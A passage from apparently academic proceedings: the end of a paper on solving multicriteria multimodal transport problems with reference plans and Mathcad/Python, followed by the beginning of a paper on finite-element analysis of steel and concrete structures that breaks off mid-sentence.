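A_eq[:nm, :nm] = np.eye(nm)                     # X^1 + X^2 + X^3 = X_bar
A_eq[:nm, nm:2 * nm] = np.eye(nm)
A_eq[:nm, 2 * nm:] = np.eye(nm)
b_eq[:nm] = X_bar.ravel()
A_eq[nm] = np.concatenate([Ck.ravel() for Ck in C])  # total cost = S_min
b_eq[nm] = res.fun

sol = linprog(np.zeros(3 * nm), A_eq=A_eq, b_eq=b_eq, bounds=(0, None))
X1, X2, X3 = (sol.x[k * nm:(k + 1) * nm].reshape(3, 3) for k in range(3))
```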
This means that cargo transportation will not use the first means of transport; the second will be used to transport 400 cargo units from departure point 1 to delivery point 2; the rest of the cargo will be delivered by the third means of transport. To verify the obtained results, we solve problem (1) in Mathcad with the same initial data, but using another, already known optimization method [17] (Figs. 7, 8 and 9):
Fig. 7. Initial data of the problem
Fig. 8. Problem solution
Fig. 9. Result of calculations
Obviously, the solution results for problem (1) obtained by these different means coincide. Next, consider the solution of the multicriteria problem (3). For that, start by solving a single-criterion problem, similar to problem (1), for the risk objective function R (the initial data are taken from [10]). The transportation risk matrices are shown in Fig. 10:
Fig. 10. Transportation risks matrices
Calculate the matrix of minimal risks (Fig. 11). The risk objective function is minimized in the traditional way (Fig. 12).
Fig. 11. Calculating matrix of minimal risks
Fig. 12. Minimizing the risk objective function
The result of solving the risk-minimization problem, similar to the cost-minimization problem from Fig. 5, is shown in Fig. 13. The sum of the obtained matrices $V_0$, $V_1$, $V_2$ gives a transportation plan that coincides with the result in Fig. 12 but differs from the one obtained in [10].
Fig. 13. Result of calculations
However, it is easy to demonstrate that

$$S^t \times X = \begin{pmatrix} 0.01 & 0.06 & 0.02 \\ 0.05 & 0.03 & 0.05 \\ 0.05 & 0.04 & 0.08 \end{pmatrix} \times \begin{pmatrix} 100 & 0 & 380 \\ 0 & 420 & 0 \\ 220 & 80 & 0 \end{pmatrix} = \begin{pmatrix} 0.01 & 0.06 & 0.02 \\ 0.05 & 0.03 & 0.05 \\ 0.05 & 0.04 & 0.08 \end{pmatrix} \times \begin{pmatrix} 320 & 0 & 160 \\ 0 & 200 & 220 \\ 0 & 300 & 0 \end{pmatrix} = 35.4,$$

that is, both solutions (values of X) are correct. At this stage of the solution, it is essential to distinguish the compromise reference plans for each optimization criterion (cost and risk, respectively): $X_S$ and $X_R$. Write these matrices based on the earlier calculations:

$$X_S = \begin{pmatrix} 0 & 400 & 80 \\ 320 & 100 & 0 \\ 0 & 0 & 300 \end{pmatrix}, \quad X_R = \begin{pmatrix} 100 & 0 & 380 \\ 0 & 420 & 0 \\ 220 & 80 & 0 \end{pmatrix}. \quad (15)$$

Now it is necessary to find the plan $\bar{X}$ that is a compromise between the plans $X_S$ and $X_R$ of (15). Calculate it in Mathcad according to formulas (13) and (14) (Fig. 14). It is considered that the volume of cargo transportation by the cost criterion is more important than the volume of transportation by the risk criterion; for example, the weight multipliers are $k_1 = 0.7$, $k_2 = 0.3$. Also consider the problem constraints on departure-point supplies and delivery-point needs. Check whether $\bar{X}$ is a reference plan (Fig. 15). Solve problem (11) for the found compromise plan $\bar{X}$ (Fig. 14). According to the input data of the problem (Figs. 2 and 10) and the results of calculations obtained in Figs. 4, 9 and 12, we have the following input data for problem (11) (Fig. 16):
Fig. 14. Calculation of compromising plan X
Fig. 15. Checking if X is a reference plan
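The computation behind Figs. 14 and 15, the weighted superposition (13)-(14) and the reference-plan check, can be sketched as follows (plans transcribed from (15); a minimal illustration, not the Mathcad worksheet itself):

```python
# Compromise plan as a weighted superposition of the cost- and risk-optimal
# reference plans, with the weights chosen in the text (k1 = 0.7, k2 = 0.3).
import numpy as np

XS = np.array([[0, 400, 80], [320, 100, 0], [0, 0, 300]], dtype=float)
XR = np.array([[100, 0, 380], [0, 420, 0], [220, 80, 0]], dtype=float)
k1, k2 = 0.7, 0.3                      # cost weighted above risk, k1 + k2 = 1

X_bar = k1 * XS + k2 * XR              # formulas (13)-(14)

# Reference-plan check: row sums equal supplies, column sums equal needs.
assert np.allclose(X_bar.sum(axis=1), [480, 420, 300])
assert np.allclose(X_bar.sum(axis=0), [320, 500, 380])
print(X_bar)
```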
Fig. 16. Initial data of the problem (11)
The Minerr function is applied to solve problem (11) with the given input data (Figs. 14 and 16). The results are obtained in Fig. 17. It is shown in Fig. 18 that the resulting matrices $V_0$, $V_1$, $V_2$ (Fig. 17), and hence the corresponding matrices $X^1$, $X^2$, $X^3$, are transportation plans for each transport type of the problem.
Fig. 17. Application of the Minerr function to solve the problem (11)
Fig. 18. Checking the results of problem solution
To improve the result of solving the problem, concessions on the objective functions S or R can be applied. For example, set the concession $d_S = 2500$ and apply it to the objective function S (Fig. 19):
Fig. 19. Results of calculations using concession dS = 2500
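One generic way to read the concession is as an epsilon-constraint: re-minimize the risk while allowing the cost to exceed its optimum by dS. The sketch below reuses the arrays from the earlier transport sketch and transcribes the risk matrix from the verification above; it is our interpretation for illustration, not the authors' system (11):

```python
# Epsilon-constraint reading of the concession dS = 2500: minimize total risk
# subject to the usual transport constraints plus "cost <= S_min + dS".
import numpy as np
from scipy.optimize import linprog

risk = np.array([[0.01, 0.06, 0.02],
                 [0.05, 0.03, 0.05],
                 [0.05, 0.04, 0.08]])           # minimal-risk matrix
S_min, dS = res.fun, 2500.0                     # optimal cost from the earlier sketch
res_R = linprog(risk.ravel(),
                A_ub=C.ravel()[None, :], b_ub=[S_min + dS],
                A_eq=A_eq, b_eq=np.concatenate([A, B]), method="highs")
print(res_R.fun)                                # best achievable risk under the concession
```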
Obviously, the results obtained in Fig. 20 for the objective functions S and R are better than those in Fig. 18, because their values are closer to the optimal ones, $S_{min}$ and $R_{min}$.
Fig. 20. Checking the results of problem solution using concession
Adjustment of the coefficients $k_1$ and $k_2$ in (13) is another way to influence the result of solving the transport problem by the proposed method. The considered examples demonstrate the algorithm for solving both single- and multicriteria multimodal transport problems. The algorithm is based on methods for finding integrated and compromise reference plans for a multimodal transport problem: the integrated reference plan method and, in the case of a multicriteria problem, the modified method of weighting coefficients and successive concessions. Generally,
a multicriteria multimodal transport problem can be solved by reducing it to a system of linear matrix equations and inequalities.
4 Discussion

The study suggests a new approach to solving both single- and multicriteria multimodal transport problems. The approach is based on applying two methods: 1) the integrated reference plan method, which searches for an integrated reference plan of the transport problem among the reference plans for each means of transport under a given optimization criterion; 2) the modified method of weighting coefficients (superposition of objective functions), which likewise produces a compromise reference plan for the transport problem but, unlike the integrated reference plan method, is applicable to the multicriteria unimodal transport problem; here the compromise reference plan is determined not across means of transportation but across different optimization criteria. As a result of applying these new approaches, a multicriteria multimodal transport problem can be reduced to a classical (unimodal, single-criterion) transport problem, for which solution algorithms are well known, and investigated through a system of linear matrix equations and inequalities of dimension σ + 1, where σ is the number of objective functions of the problem. The paper presents a block scheme of the algorithm for solving the multicriteria multimodal transport problem. Successive iterations according to the scheme are presented as a numeric problem solution. The practical value of the integrated reference plan method for numeric solutions of this kind is that it helps define a first iteration close to the problem solution; therefore, the number of iterations required can be considerably reduced. The applied effect of the improved first iteration depends considerably on the objective functions of the problem, on its dimensions (the number of departure and delivery points), and on other parameters that affect the volume of processed data. The matter of dimensionality of the objective-function superposition led to the investigation of new multicriteria optimization methods to be applied to solving transport problems. The peculiarity of the proposed method is that it uses a superposition not of objective functions but of the reference plans of the problem for each optimization criterion.
5 Conclusions

The article addresses solving multimodal transport problems with one and several optimization criteria by constructing reference plans using the integrated reference plan method. The algorithm based on this method has been enriched and expanded through constructing systems of linear matrix equations and inequalities. It is shown that in the case of a multicriteria transport problem it is appropriate to use such optimization methods as the method of weighting coefficients and the method of successive concessions, previously
adapted to the related problem model. These methods are well suited for searching for compromise reference plans of the problems and help to solve the dimensionality problem of the objective-function superposition. The paper also demonstrates the ability to transform a σ-criteria multimodal transport problem into a classical transport problem through constructing a system of linear matrix equations and inequalities of dimension σ + 1. Demonstration examples of the problem were solved using the Mathcad environment, but they could be solved with the help of other computer mathematics tools. Furthermore, if a multicriteria (but unimodal) transport problem is considered separately, a new method of its solution can be proposed. This method is based on the search for a compromise reference plan relative not to transport means, as in the integrated reference plan method, but to optimization criteria. In fact, this method combines characteristics of the weighting coefficients and successive concessions methods. The application of the previously mentioned methods for solving multicriteria and multimodal transport problems makes it possible to reduce the number of iterations in the numeric solution of these problems and to overcome the dimensionality problem of the superposition of their objective functions. It means that every method that uses the superposition of the objective functions of the optimization problem can be used for its solution. The methods that have been extended and adapted to the described models of transport problems can potentially increase the efficiency of the search for the optimal solution. This improvement is achieved through the definition of a more exact first numeric iteration, which reduces the number of iterations and simplifies the calculations using software tools. This especially matters in the case of a transport problem of large dimension, a large number of operated parameters, calculation of the Pareto set for its solution, and/or many objective functions. The study revealed that a complex multicriteria multimodal transport problem can be solved through its decomposition into several simpler classical (standard, single-criterion unimodal) transport problems and, in fact, into one algebraic problem of solving a system of linear matrix equations and inequalities. Further research should focus on analyzing various approaches to solving multicriteria multimodal transport problems and on comparing their efficiency and similarity. Besides, it would be interesting to analyze the ability of the decision-maker to influence the solution of multicriteria multimodal transport problems by choosing the values of the weighting coefficients and concessions.
References

1. Archetti, C., Peirano, L., Speranza, M.G.: Optimization in multimodal freight transportation problems: a survey. Eur. J. Oper. Res. 299(1), 1–20 (2022). https://doi.org/10.1016/j.ejor.2021.07.031
2. Das, A.K., Deepmala, Jana, R.: Some aspects on solving transportation problem. Yugoslav J. Oper. Res. 30(1), 45–57 (2020). https://doi.org/10.2298/YJOR190615024D
3. Gupta, K., Arora, R.: Three dimensional bounded transportation problem. Yugoslav J. Oper. Res. 31(1), 121–137 (2021). https://doi.org/10.2298/YJOR191215013G
4. Rossolov, A., Kopytkov, D., Kush, Y., Zadorozhna, V.: Research of effectiveness of unimodal and multimodal transportation involving land kinds of transport. East.-Eur. J. Enterp. Technol. 5(3(89)), 60–69 (2017). https://doi.org/10.15587/1729-4061.2017.112356
5. Laurent, A.-B., Vallerand, S., van der Meer, Y., D'Amours, S.: CarbonRoadMap: a multicriteria decision tool for multimodal transportation. Int. J. Sustain. Transp. 14(3), 205–214 (2020). https://doi.org/10.1080/15568318.2018.1540734
6. Chen, D., Zhang, Y., Gao, L., Thompson, R.G.: Optimizing multimodal transportation routes considering container use. Sustainability 11(19), 5320 (2021). https://doi.org/10.3390/su11195320
7. Tokcaer, S., Özpeynirci, Ö.: A bi-objective multimodal transportation planning problem with an application to a petrochemical ethylene manufacturer. Marit. Econ. Logist. 20, 72–88 (2018). https://doi.org/10.1057/s41278-016-0001-4
8. Kaewfak, K., Ammarapala, V., Huynh, V.N.: Multi-objective optimization of freight route choices in multimodal transportation. Int. J. Comput. Intell. Syst. 14(1), 794–807 (2021). https://doi.org/10.2991/ijcis.d.210126.001
9. Owais, M., Alshehri, A.: Pareto optimal path generation algorithm in stochastic transportation networks. IEEE Access 8, 58970–58981 (2020). https://doi.org/10.1109/ACCESS.2020.2983047
10. Su, J., et al.: Constructing reference plans of two-criteria multimodal transport problem. Transp. Telecommun. 22(2), 129–140 (2021). https://doi.org/10.2478/ttj-2021-0010
11. Bychkov, I., Zorkaltsev, V., Kazazeva, A.: Weight coefficients in the weighted least squares method. Numer. Anal. Appl. 8(3), 223–234 (2015). https://doi.org/10.1134/S1995423915030039
12. Plaia, A., Buscemi, S., Sciandra, M.: Consensus among preference rankings: a new weighted correlation coefficient for linear and weak orderings. Adv. Data Anal. Classif. 15(4), 1015–1037 (2021). https://doi.org/10.1007/s11634-021-00442-x
13. Dovha, N., Tsehelyk, H.: Using the method of successive concessions for solving the problem of increasing cost price. Young Sci. 10(86) (2020). https://doi.org/10.32839/2304-5809/2020-10-86-6
14. Bakurova, A., Ropalo, H., Tereschenko, E.: Analysis of the effectiveness of the successive concessions method to solve the problem of diversification. In: CEUR Workshop Proceedings, vol. 2917, pp. 231–242 (2021)
15. Honcharov, A.V., Mogilei, S.O.: Methods of realization of multicriteria business-models of multimodal transport companies. Math. Comput. Model. Tech. Sci. 22, 50–58 (2021). https://doi.org/10.32626/2308-5916.2021-22.50-58
16. Gubina, S.: The solution of optimization problems by means of Mathcad and MS Excel. Actual Dir. Sci. Res. XXI Century: Theory Pract. 2(5), 268–270 (2016). https://doi.org/10.12737/6402
17. Honcharov, A.V., Mogilei, S.O.: Realization of multimodal transport problems by different program means. Bull. Cherkasy State Technol. Univ. 3, 67–74 (2020). https://doi.org/10.24025/2306-4412.3.2020.215516
Numerical Analysis of the Stress-Strain State of Combined Steel and Concrete Structures

Grygorii Gasii1(B), Olena Hasii2, Ivan Skrynnik3, and Oleksandr Lizunkov3

1 National Aviation University, Kyiv, Ukraine
[email protected]
2 Poltava University of Economics and Trade, Poltava, Ukraine
3 Central Ukrainian National Technical University, Kropyvnytskyi, Ukraine
Abstract. The article presents the results of numerical experiments aimed at studying the stress-strain state of combined steel and concrete structures and separate elements under loading by computer simulation of their behavior. Following the goal, the simulation is carried out using experimentally obtained stress-strain diagrams of the applied materials. The study of the structures is carried out using the finite element method on both two-dimensional and three-dimensional models. To obtain reliable numerical data, additional research is carried out, the essence of which is to find parameters and boundary conditions that achieve convergence of the results for each computer model, as well as to carry out numerical studies similar to the experimental ones. Taking into account the received data, several numerical studies are conducted, which makes it possible to find additional information about the stress-strain state of the structures; in particular, the behavior of the developed nodal connections is modeled. A comparison of the obtained numerical and experimental data shows their high convergence. Keywords: Stress-strain state · combined steel and concrete structures · computer models · simulation
1 Introduction

Today, the rapid development of technology and computers, including laptops and desktop personal computers, generates a significant amount of research related to mathematical modeling, numerical analysis, and simulation of building structures or separate elements under various loads and influences. Of all the numerical methods used for this, the finite element method is the most widespread [1–7, 9, 11, 13, 15, 17, 19]. The use of modern multifunctional calculation software based on the finite element method creates opportunities for short-term design, prediction of behavior, and strength analysis of building structures, buildings and facilities, and more. This opens up opportunities to obtain data on the structure's behavior that are sometimes difficult or even impossible to obtain experimentally or analytically. Therefore, the aim and objectives of the study are to solve the problems associated with the numerical study of structures and the adaptation and verification of some key points,
in particular, the choice of the type, shape, and size of finite elements; the setting of boundary conditions; the acceptance of the material model and the specification of its physical and mechanical characteristics; taking into account various types of nonlinearities, etc.
2 Materials and Methods

Numerical studies have been conducted to obtain additional information about the behavior and stress-strain state of the combined steel and concrete structures, and some of the results should be considered in conjunction with the results of experimental and analytical studies [8]. As world experience shows, the solution to applied problems of varying complexity can be achieved both by setting up an experiment and by mathematical modeling [16, 20]. Using each of these methods, one can solve a problem. With the help of an experiment, one can get solutions to both simple and very complex problems, but the reliability of the results will be limited by the conditions under which the experiment has been conducted or those that are provided and taken into account by the experimental research methods. Numerical experiments, in turn, make it possible to significantly expand these conditions and obtain a more detailed picture of the behavior and stress-strain state of the structures. Because of this, it is expedient to conduct numerical research with elements of optimization and analysis of the stress-strain state of the combined steel and concrete structures and of their single components or elements. Numerical studies of the structures were performed using computational complexes [14] that implement the finite element method and have a wide range of functionalities, including means of visualization of the obtained solutions in the form of isolines, plots, etc. The numerical studies generally included several stages performed in a certain sequence. First of all, the object of research was determined, i.e., the physical formulation of the problem was performed. At the next step, a finite element model was created, i.e., the mathematical formulation of the problem. Then modeling (solution search), analysis of the obtained results, and their comparison with the experiment were performed alternately. Due to the prevalence of the finite element method, this study does not focus on its theoretical principles, provisions, and assumptions, as they are well known, and because the purpose of the study is not to improve the method. The finite element method, implemented in the software, is used only as a tool for solving the tasks: the analysis of the stress-strain state of combined steel and concrete structures and components. Thus, the main focus is on certain issues that are directly related to the study of the structures or are subject to uncertainty and affect the accuracy of the results. Such issues include choosing the type, shape, and size of finite elements, because the choice of these parameters, as well as the imposition of constraints or the setting of boundary conditions, is left to the user of the software. In addition, important issues are the adoption of the material model, the setting of its physical and mechanical characteristics, taking into account various kinds of nonlinearities, etc. Therefore, as mentioned earlier in the introduction, the purpose of the research is primarily to apply the finite element method to analyze the stress-strain state of combined
steel and concrete structures and to establish the nature of failure by creating and calculating mathematical models of combined steel and concrete structures, taking into account key points such as the shape and size of finite elements, boundary conditions, the material model, and physical and constructive nonlinearities [10, 15], with subsequent verification of the results through comparison with the results of physical experiments. For an adequate description of the structure model and its behavior under load, boundary conditions were adopted that correspond as closely as possible to real conditions. In particular, the adopted support corresponds to the real behavior of the structure: a freely supported structure working as a two-way slab. The current study presents and explains the key points of the analytical statement of the research problem; for integral cases, the analytical statement (taking into account the peculiarities of the research, in particular the boundary, geometric, and initial conditions) is considered in the authors' previous studies [4, 17] and [5, 14].
3 Experiments

In most cases, the application of classical concepts and the theory of elasticity is sufficient to solve the problem, but sometimes, for example, when predicting behavior at the stages of work preceding failure and determining the bearing capacity of elements, it is likely to be insufficient. Due to the peculiarities of the structure, it was preferable to establish its actual behavior taking into account various kinds of nonlinearities. The physical nonlinearity of the structure arises because the strain of the materials from which it is made, in particular concrete, follows a nonlinear law, i.e., there is no linear relationship between stresses and strains. The physical nonlinearity of the materials of the created structures was modeled with the help of finite elements, for which the nonlinear dependence is realized by introducing material deformation diagrams (Prandtl diagrams). It is noteworthy that the software used allows taking into account almost any nonlinear properties of materials in this way. The possibility of taking physical nonlinearity into account in this way is stated in the publications [10, 15]. The structural nonlinearity of the created structures is determined by the property of its elements (lower belt elements, joints of upper belt elements, etc.) to be included in the work depending on various factors of the stress-strain state; in particular, lower belt elements (flexible rods, cables, tapes, etc.) can work only in tension and, in the case of a rolled profile of round or other cross-section used as a cable, under low compression forces. In this case, the constructive nonlinearity can be reduced to a nonlinear relationship between forces and displacements. Thus, depending on the research task and the functionality of the software used, different models were used. An elastic model was used for numerical experiments on structures that require modeling of the contact surfaces of different materials or elements at their joints; the calculation of structures or individual structural elements made of homogeneous material, in particular steel, was performed in an elastic or elastically
nonlinear setting with the introduction of diagrams (Fig. 1); the calculation of composite sections, in particular reinforced concrete slabs, was performed in an elastically nonlinear setting using the diagrams (Prandtl diagrams) of the simulated materials (Fig. 1).
Fig. 1. The stress-strain diagrams for concrete (left diagram) and steel (right diagram)
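For reference, an elastic-perfectly-plastic (Prandtl) diagram of the kind shown in Fig. 1 can be written in a few lines; the parameters below are illustrative (the yield stress is not a value reported in the paper):

```python
# Minimal sketch of a Prandtl (elastic-perfectly-plastic) stress-strain law:
# linear up to the yield stress, constant plateau beyond it, symmetric in sign.
def prandtl_stress(eps: float, E: float, sigma_y: float) -> float:
    """Stress in MPa for a given strain, modulus E and yield stress sigma_y."""
    return max(-sigma_y, min(sigma_y, E * eps))

# Steel-like parameters: E = 2.1e5 MPa (quoted later in the text),
# sigma_y = 240 MPa (assumed for illustration).
for eps in (0.0005, 0.001, 0.002, 0.005):
    print(eps, prandtl_stress(eps, E=2.1e5, sigma_y=240.0))
```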
Further, following [14], the key points of the mathematical model used to analyze the stress-strain state of combined steel and concrete structures are described; for clarity, a detailed description of the mathematical model with explanations is given in [14]. When solving boundary value problems of the mechanics of a deformable solid concerning the stress-strain state, i.e., the determination of the displacements $U_i(\vec{x}, t)$, strains $\varepsilon_{ij}(\vec{x}, t)$ and stresses $\sigma_{mn}(\vec{x}, t)$ at each point of the body, systems of static equilibrium equations, geometric relations, and equations of physical models of the material are used [14]. It is assumed that at the initial moment $t_0$ the magnitudes $U_i(\vec{x}, t)$, $\varepsilon_{ij}(\vec{x}, t)$ and $\sigma_{mn}(\vec{x}, t)$ in the body are known or equal to zero. Then in the body $\Phi$, as well as on its surface $\Theta$, over some time $\Delta t$ there is a change of load
with step $n$; i.e., at the moment $t_{n+1}$, volume $Q^m(x; t)$, surface $P^m(x; t)$ and concentrated $R^m(x; t)$ forces are applied. The static equilibrium equation has the following form [14]:

$$\nabla_n \sigma^{mn} + \bar{Q}^n = 0, \quad (1)$$

where $\bar{Q}^n$ is the set load. Regarding the geometric relations, the deformations are considered compatible, and a strain level of 2% is used [14]:

$$\varepsilon_{ij} = \varepsilon_{ij}^{E} + \varepsilon_{ij}^{T} + \varepsilon_{ij}^{C} + \varepsilon_{ij}^{P}. \quad (2)$$

That is, the total strains $\varepsilon_{ij}$ are the algebraic sum of the elastic $\varepsilon_{ij}^{E}$, temperature $\varepsilon_{ij}^{T}$, creep $\varepsilon_{ij}^{C}$ and plasticity $\varepsilon_{ij}^{P}$ components [14]. It should be noted that elastic deformations are always present, while the others appear only when the corresponding boundary value problem is considered; in this case $\varepsilon_{ij} = \varepsilon_{ij}^{E}$.
There is an unambiguous relationship between stresses and elastic deformations (Hooke's law); i.e., the equation of the physical model of the material in an elementary volume of the body, determining its linear-elastic deformations, has the form:

$$\sigma^{mn} = E^{mnij} \cdot \varepsilon_{ij}^{E}. \quad (3)$$

An isotropic elastic material is given by independent elastic characteristics, Young's modulus $E$ and Poisson's ratio $\nu$, and the associated shear modulus:

$$G = E / (2 \cdot (1 + \nu)). \quad (4)$$

Equations for determining elastically nonlinear deformations are expressed in the form of the following laws. Elastic change of volume:

$$\varepsilon_V^S = \sigma_V / 3k, \quad (5)$$

where $\varepsilon_V^P = \varepsilon_V^C = 0$. Shape changes:

$$e_{ij}^S = \varphi \cdot S_{ij}, \quad \varphi = 3\varepsilon_u^S / 2\sigma_u. \quad (6)$$

Equation of state, determined experimentally and given in the form of a functional dependence:

$$\sigma_u = K(\varepsilon_u^S), \quad (7)$$

where $k = k(\vec{x}; T)$ is the modulus of volumetric compression; $\varepsilon_V = \delta_{ij} \cdot \varepsilon_{ij} / 3$ and $\sigma_V = \delta_{ij} \sigma_{ij} / 3$ are the bulk strains and stresses, respectively; $e_{ij} = \varepsilon_{ij} - \delta_{ij} \varepsilon_V$ and $S_{ij} = \sigma_{ij} - \delta_{ij} \sigma_V$ are the components of the deviatoric parts of the strain and stress tensors, respectively; $\varepsilon_u^S$ and $\sigma_u$ are the intensities of the strains $\varepsilon_{ij}^S = \varepsilon_{ij} - \varepsilon_{ij}^T$ and the stresses $\sigma_{ij}$, respectively. Since the model of the material is elastic, all strains are reversible, and the functional dependence (7) can be given in the first quadrant as a tensile curve and in the third as a compression curve. The equations of static equilibrium, geometric relations, and equations of the physical model of the material are supplemented by boundary conditions
of the second kind, $\sigma^{mn} V_n |_{S_r} = \bar{P}^m$, as well as by concentrated forces $R^m$ applied to the nodes of the finite element model. In the general case, an elastic model of the material was used to conduct the numerical experiments; the modulus of elasticity and Poisson's ratio were given for this purpose. Unless otherwise indicated, $E = 2.0 \ldots 2.1 \times 10^5$ MPa and $\nu = 0.3$ for steel, and $E = 3.20 \ldots 3.31 \times 10^4$ MPa and $\nu = 0.2$ for concrete. For other studies (unless otherwise noted), an elastically nonlinear model of the material was used that took its physical nonlinearity into account. To model the elastically nonlinear material, a functional dependence of the "stress-strain" type was additionally set. To describe the different properties of the material during compression and tension, in
particular concrete, the σ − ε dependence was given in the first and third quadrants. To describe the properties of steel, the σ − ε dependence was given in the first quadrant. The type of material in all cases was considered isotropic. It should be noted that the σ − ε dependencies were created for all materials (concrete, steel pipes, fittings, sheet steel, etc.) based on the results of experimental tests of standard samples [16, 18] or reference data. The geometry of all models was built by importing ACIS files with the sat extension, which contained information about three-dimensional geometric models built using a third-party computer-aided design system.
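As a small worked instance of Eq. (4) with the elastic constants quoted above (the helper function is ours, for illustration):

```python
# Shear modulus from Young's modulus and Poisson's ratio, Eq. (4).
def shear_modulus(E: float, nu: float) -> float:
    return E / (2.0 * (1.0 + nu))

G_steel = shear_modulus(2.1e5, 0.3)       # ~8.08e4 MPa
G_concrete = shear_modulus(3.2e4, 0.2)    # ~1.33e4 MPa
print(G_steel, G_concrete)
```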
4 Results

When performing computer simulation of combined steel and concrete structures and single elements under external load, the results and experience of the research on a combined steel and concrete slab in [16] were used; therefore, to study the stress-strain state of combined steel and concrete structures, a three-dimensional model with finite elements no larger than 5 × 5 × 5 mm was used. Structures of the same dimensions as in the experimental research, with similar physical and mechanical properties of materials, are taken as the experimental model [16]. Figure 2 shows regions with the failure stress of 30 MPa (this stress is taken as the failure stress of the structure). Attention is not focused on other stress regions, as they do not carry important information for the set goal. In this model, the steel rod elements, which can be seen in Fig. 4, a, are conventionally not shown and are replaced by supports. That is, the composite plate part of the complex structure is investigated, since the stress-strain state of the steel rod elements is clear. Of course, such failure stress was considered a failure criterion of the structure only for the compressed concrete, which is dispersedly reinforced with steel wire, although the figure also shows 30 MPa regions in places where tensile stress appeared, where in fact the rod reinforcement is in tension, not the concrete. However, under such stresses cracks can appear, which are also a criterion for the destruction of the structure. The load consisted of point loads applied at four spots in stages according to the experimentally obtained deformation diagrams of the materials. The combined steel and concrete structure model included concrete, rod reinforcement (similar to a reinforced concrete slab) in the stiffeners, and reinforcing mesh, each of which was modeled with a solid object 1 mm high. The results of computer simulations of combined steel and concrete structures under concentrated force are presented in Fig. 3. The results are reflected in the form of stress isolines [16, 17]. It can be seen from the figure that in the reinforced cement slab the stresses are distributed symmetrically about the symmetry axes. The maximum stress is at the stiffness ribs at the location of the applied force on the lower surface of the plate, as well as along the upper face of the stiffness axis at the location of the change in the cross-sectional area (at the transition of the plate to the stiffness ribs). To identify the weakest spot and the regions prone to failure, a detailed analysis of the stress distribution was made. From the above distribution of critical stresses in the body of combined steel and concrete structures, it can be seen that the most stressed areas are those: located close to
Fig. 2. Regions of failure stress in the reinforced cement slab (green color)
Fig. 3. Comparison of the nature of the failure of combined steel and concrete structures, obtained by the experimental way (a) and computer simulation (b), where 1, 2, 3, and 4 are the numbering of failure regions following Fig. 2
the application of the concentrated force, both at the top and bottom of the plate (region 1 in Fig. 3); in the interval between the place of application of the concentrated force and the support section (region 2 in Fig. 3); at the places of support of the plate (region 3 in Fig. 3); located on the lower edge of the stiffeners (region 4 in Fig. 3). The identified regions with the highest stresses completely coincide with those obtained experimentally. The coincidence of the results of the computer and physical experiments in determining the nature of the destruction of the supporting part of the plate is clearly traced. The joint work of the components of combined steel and concrete structures was taken into account when building the computer model of the connection node and imposing the boundary conditions on it. The physical and mechanical characteristics of materials were modeled by specifying the modulus of elasticity and Poisson's ratio, which were determined experimentally [16, 17]. Combined steel and concrete structures were modeled by specifying the above characteristics [16]. As an example, the stress-strain state of the links of combined steel and concrete structures, which consisted of volume modules with plan dimensions of 0.8 × 0.8 m and a height of 0.5 m, was analyzed. The finite element model was built taking into account the recommendations of [12].
The contact surface was simulated between the steel members and the concrete. A contact surface was also defined for the bolted assembly to simulate the hinge in the joints. Because finding a solution for the whole structure takes a lot of time, and the model itself includes a large number of complex parts and contact surfaces, which can cause significant errors in the calculation, finite element analysis of the link was performed on a fragment of the structure. In the finite element analysis of the joint, the main emphasis was on the study of the stress-strain state under loading, so the load and the physical and mechanical properties of the materials were set following this condition. To obtain objective data, the model was calculated for six research schemes, each with different boundary conditions. Following the first, second, and third schemes of the study, the model of the structure was hinged on both sides. Following the fourth, fifth, and sixth research schemes, the model had a hinged fastening on one side and a freely supported edge on the other. The fixation of the lower belt for all schemes of the study was such that it allowed horizontal movement in the longitudinal direction. The loading was assumed to be evenly distributed and, depending on the research scheme, was applied to different parts of the structure. Following the first and fourth research schemes, the load was applied to the entire surface (simultaneously to the steel and reinforced concrete part), according to the second and fifth to the steel part, and according to the third and sixth only to the reinforced concrete slab (see Fig. 4, a). In general, the connection link ensures reliable and compatible work of the components of the structure, regardless of the method of application of external loads (Fig. 4), and was modeled in the manner described in [20]. When the loads were applied, the joint did not deform significantly in a way that could lead to failure. This was confirmed by the results of experimental studies of combined steel and concrete structures under temporary load applied in the links.
Fig. 4. Experimental model of the components joint of the combined steel and concrete structures (a) and the stress-strain state modeling in MPa following the first type of boundary conditions (b)
5 Discussions

The results in the form of stress isolines show that a computer experiment on a mathematical model, which is a numerical implementation of a real structure tested under a similar load and the same boundary conditions, allowed obtaining a true picture of the stress distribution over its body. Thus, it is possible to assert the reliability of the obtained results and the applicability of the developed computer experiment method to the study of the created structures under the action of other loads and influences. Note that practical convergence of the deflections (displacements) of the structure for different densities of the finite element model is achieved quickly enough, so a grid of 40 × 40 mm is sufficient to determine the deflections of the plate within an error of 5%. However, the situation is different with the convergence of stresses. The difficulty of achieving practical convergence of stresses sometimes occurs in the finite element analysis of structures under the action of a concentrated force. This is evidenced by the example given in [11], which compares the results of the calculation of a hinged plate under the action of a uniformly distributed load and of a concentrated force. The comparison has shown that the rate of coincidence of the simulation results under the action of a concentrated force is lower than under the action of a uniformly distributed load. It should be noted that the low rate of coincidence of the calculation results applies only to extreme values; in general, over the whole surface the forces have better convergence, which allows analyzing the stress-strain state of the structure within the allowable error. For a more objective analysis of the studied structure, it is recommended in [11] not to take into account the required values at places located close to the place of application of the force. Thus, analyzing and comparing the results of the numerical calculations, it was found that to analyze the stress-strain state of combined steel and concrete structures one should take a finite element model with a dimension not exceeding 200 mm. It should be noted that the three-dimensional models included both concrete and reinforcement, the latter modeled by individual rods of square cross-section with an area equivalent to that of the reinforcing rods of circular cross-section used in reinforcing the actual structure. The results of the calculation of the model are reflected in the form of stress isolines. The main criterion for the strength of the experimental structures is the state when the maximum stresses reach values corresponding to the material strength; i.e., after calculating the models of the experimental structures for loads similar to the experimental ones, it was assumed that the structure collapses in places with ultimate stresses.
6 Conclusions

The performed computer simulation makes it possible to obtain additional information about the stress-strain state of the structures. The sizes of finite elements for modeling the work of the created structures are determined by gradually increasing the density of the finite element models of the studied structures and establishing the convergence of the results. It is established that to obtain objective numerical data on the stress-strain state of combined steel and concrete structures, it is necessary to create finite element models,
